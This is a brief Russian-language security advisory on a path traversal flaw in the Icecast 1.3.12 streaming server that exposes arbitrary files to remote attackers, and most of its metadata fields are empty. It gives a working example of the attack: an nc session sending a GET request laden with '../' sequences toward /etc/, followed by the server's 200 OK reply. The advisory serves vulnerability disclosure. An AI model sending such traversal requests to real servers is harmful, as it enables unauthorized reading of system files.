Доступ к произвольным файлам в Icecast

Дата публикации:
12.07.2002
Всего просмотров:
869
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание: Icecast - сервер потокового аудио для unix и windows платформ. Обнаруженная уязвимость позволяет удаленному атакующему получить доступ к произвольным файлам на системе. Пример:
 
% nc icecast.host 8000
GET /file/../../../../../../../../etc/ HTTP/1.0

HTTP/1.0 200 OK
Server: icecast/1.3.12
Connection: close
Content-Type: text/html
Уязвимость обнаружена в Icecast 1.3.12

Ссылки: VANED LABS: icecast filesystem disclosure
или введите имя

CAPTCHA